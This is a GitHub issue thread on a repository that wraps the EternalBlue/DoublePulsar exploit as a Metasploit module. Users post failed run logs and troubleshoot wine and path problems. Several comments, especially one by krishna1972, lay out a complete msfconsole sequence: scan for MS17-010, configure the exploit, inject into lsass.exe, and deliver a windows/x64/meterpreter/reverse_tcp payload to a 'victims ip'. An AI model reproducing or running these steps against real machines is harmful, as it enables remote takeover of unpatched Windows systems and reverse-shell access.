Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1

Bad EXE format #4

Open syrius01 opened 7 years ago

syrius01 commented 7 years ago

```
[*] Started reverse TCP handler on 192.168.1.150:4444
[*] 192.168.1.31:445 - Generating Eternalblue XML data
[*] 192.168.1.31:445 - Generating Doublepulsar XML data
[*] 192.168.1.31:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.31:445 - Writing DLL in /root/.wine64/drive_c/eternal11.dll
[*] 192.168.1.31:445 - Launching Eternalblue...
wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Eternalblue-2.2.0.exe.
[-] 192.168.1.31:445 - Are you sure it's vulnerable?
[*] 192.168.1.31:445 - Launching Doublepulsar...
Application tried to create a window, but no driver could be loaded.
Make sure that your X server is running and that $DISPLAY is set correctly.
wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Doublepulsar-1.3.1.exe.
[-] 192.168.1.31:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
```

ghost commented 7 years ago

It's a wine problem; try adjusting the path and/or upgrading wine.

UrielRicardo commented 7 years ago

@syrius01 Just as you gave the command "set RHOST xxx.xxx.xxx.xx", run to the path of the deps directory. Example: "set eternalbluepath /root/xxxx/deps"

Fighter19 commented 7 years ago

You're using a 64 bit version of wine instead of using a 32 bit version.

LockGit commented 7 years ago

I also have this problem, how to solve it?

```
root@kali:~# uname -ar
Linux kali 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@kali:~# wine --version
wine-1.7.33
```

LockGit commented 7 years ago

apt-get install winetricks, everything is fine!

LukeSynn commented 7 years ago

Got the same error running: Kali 4.9.0-kali3-amd64

Seems like wine32 was removed from the apt-get repository in recent Kali versions (2017), and even when a path is added, you receive the error:

```
The following packages have unmet dependencies:
 wine32:i386 : Depends: libc6:i386 (>= 2.17) but it is not installable
               Depends: libwine:i386 (= 1.8.7-2~bpo8+1) but it is not going to be installed
               Recommends: wine:i386 (= 1.8.7-2~bpo8+1)
E: Unable to correct problems, you have held broken packages.
```

Any plans to make the .exe files available for wine 64-bit?

italy2010 commented 7 years ago

I have this issue

```
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.226.130:4444
[*] 1.1.1.1:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
[*] 1.1.1.1:445 - Generating Doublepulsar XML data
cp: cannot stat '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
[*] 1.1.1.1:445 - Generating payload DLL for Doublepulsar
[*] 1.1.1.1:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 1.1.1.1:445 - Launching Eternalblue...
sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
wine: cannot find L"C:\windows\system32\Eternalblue-2.2.0.exe"
[-] 1.1.1.1:445 - Are you sure it's vulnerable?
[*] 1.1.1.1:445 - Launching Doublepulsar...
sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
wine: cannot find L"C:\windows\system32\Doublepulsar-1.3.1.exe"
[-] 1.1.1.1:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
```

LockGit commented 7 years ago

@italy2010 show options , see dir .........

krishna1972 commented 7 years ago

I am the same as @italy2010. I have tried to change the dir. Fixed it.

k1ng88 commented 7 years ago

@krishna1972 how did you fix that? I am getting the same error as @italy2010. Tried to move the Eternalblue-Doublepulsar-Metasploit/deps into another folder, but still not fixed.

krishna1972 commented 7 years ago

OK, so I changed /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar- al I needed because the eternalblue-doublepulsar file was in my downloads file (path), so /root/Downloads/Eternalblue-Doublepulsar/deps, that is both paths. Next I changed the processinject to lsass.exe because it is x64, then the payload is windows/x64/meterpreter/reverse_tcp. That was pretty much it. Please let me know how you get on. Thanks

LockGit commented 7 years ago

First: set the correct file path and dir path. If the file or dir path does not exist, you can use the mkdir command to create it and move these files to the dir you created!

I was successful !!!

krishna1972 commented 7 years ago

Yep that's it


On 5/07/2017, at 1:56 PM, ↓↓↓↓↓↓↓↓↓↓ notifications@github.com wrote:

first: set correct file path,dir path, if file or dir path not exits , you can use mkdir command create it and move these file to you create dir !

if not work:
Change: PROCESSINJECT wlms.exe/lsass.exe or other
use exploit/windows/smb/eternalblue_doublepulsar
set listen port (use multi/handler)
set payload windows/x64/meterpreter/reverse_tcp (64bit)
set payload windows/meterpreter/reverse_tcp (32bit)
I was successful !!!


k1ng88 commented 7 years ago

Have done that, and also followed this ref: http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/

but somehow still getting same error

```
[*] Started reverse TCP handler on 192.168.119.137:4444
[*] 192.168.1.210:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory
[*] 192.168.1.210:445 - Generating Doublepulsar XML data
cp: cannot stat '/root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory
[*] 192.168.1.210:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.210:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.210:445 - Launching Eternalblue...
sh: 1: cd: can't cd to /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps
wine: cannot find L"C:\windows\system32\Eternalblue-2.2.0.exe"
[-] 192.168.1.210:445 - Are you sure it's vulnerable?
[*] 192.168.1.210:445 - Launching Doublepulsar...
sh: 1: cd: can't cd to /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps
wine: cannot find L"C:\windows\system32\Doublepulsar-1.3.1.exe"
[-] 192.168.1.210:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
```

krishna1972 commented 7 years ago

1st: Go to your terminal, then > service postgresql start

2nd: Go to your folder where your eternalblue-doublepulsar is, then go to deps in your eternalblue-doublepulsar

3rd: Go and open msfconsole in another terminal

```
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS victims ip
RHOSTS => victims ip
msf auxiliary(smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   RHOSTS     victims ip       yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > back
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       wlms.exe                                         yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST                                                                yes       The target address
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Exploit target:

   Id  Name
   8   Windows 7 (all services pack) (x86) (x64)

msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps
DOUBLEPULSARPATH => /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps
msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps
ETERNALBLUEPATH => /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe
PROCESSINJECT => lsass.exe
msf exploit(eternalblue_doublepulsar) > set RHOSTvictims ip
RHOST =>victims ip
msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64

msf exploit(eternalblue_doublepulsar) > show targets

Exploit targets:

   Id  Name
   0   Windows XP (all services pack) (x86) (x64)
   1   Windows Server 2003 SP0 (x86)
   2   Windows Server 2003 SP1/SP2 (x86)
   3   Windows Server 2003 (x64)
   4   Windows Vista (x86)
   5   Windows Vista (x64)
   6   Windows Server 2008 (x86)
   7   Windows Server 2008 R2 (x86) (x64)
   8   Windows 7 (all services pack) (x86) (x64)

msf exploit(eternalblue_doublepulsar) > set target 8
target => 8
msf exploit(eternalblue_doublepulsar) > set LHOST your ip
LHOST => your ip
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(eternalblue_doublepulsar) >
msf exploit(eternalblue_doublepulsar) > exploit
```

that is everything.

krishna1972 commented 7 years ago

every step

k1ng88 commented 7 years ago

@krishna1972 OK, I just followed through it. The previous error is gone, thanks.

```
[*] Started reverse TCP handler on 192.168.119.137:4444
[*] 192.168.1.210:445 - Generating Eternalblue XML data
[*] 192.168.1.210:445 - Generating Doublepulsar XML data
[*] 192.168.1.210:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.210:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.210:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.1.210:445 - Are you sure it's vulnerable?
[*] 192.168.1.210:445 - Launching Doublepulsar...
[-] 192.168.1.210:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
```

But come up with this error, I will try to use other target later and see the result.

Thanks again

adrianabadin commented 6 years ago

Hello, I can't make this work. I've tried everything you mentioned above and I still get the following message:

```
[*] Started reverse TCP handler on 192.168.0.13:4444
[*] 192.168.1.16:445 - Generating Eternalblue XML data
[*] 192.168.1.16:445 - Generating Doublepulsar XML data
[*] 192.168.1.16:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.16:445 - Writing DLL in /home/orphan/.wine/drive_ceternal11.dll
[*] 192.168.1.16:445 - Launching Eternalblue...
err:menubuilder:init_xdg error looking up the desktop directory
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000
[-] Error getting output back from Core; aborting...
[-] 192.168.1.16:445 - Are you sure it's vulnerable?
[*] 192.168.1.16:445 - Launching Doublepulsar...
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000
[-] 192.168.1.16:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
```

What do I do wrong? Thanks

krishna1972 commented 6 years ago

Where have you saved eternal blue-doublepulsar-Metasploit to?


adrianabadin commented 6 years ago

@krishna1972 Thanks for your reply. I've saved eternalblue in /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/deps and in /root/Eternalblue-Doublepulsar-Metasploit. I'm running BackBox 5.

krishna1972 commented 6 years ago

OK, for starters I use Kali Linux. Then I went to GitHub and downloaded the eternalblue-doublepulsar. Get rid of opt/././. Only use the root with deps at end.


rlim0x61 commented 6 years ago

I fixed this issue by adding to my kali support to both archs x86 and x64 and also by updating the system and getting wine32 installed. See below:

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

krishna1972 commented 5 years ago

You need to be more specific, send your error messages.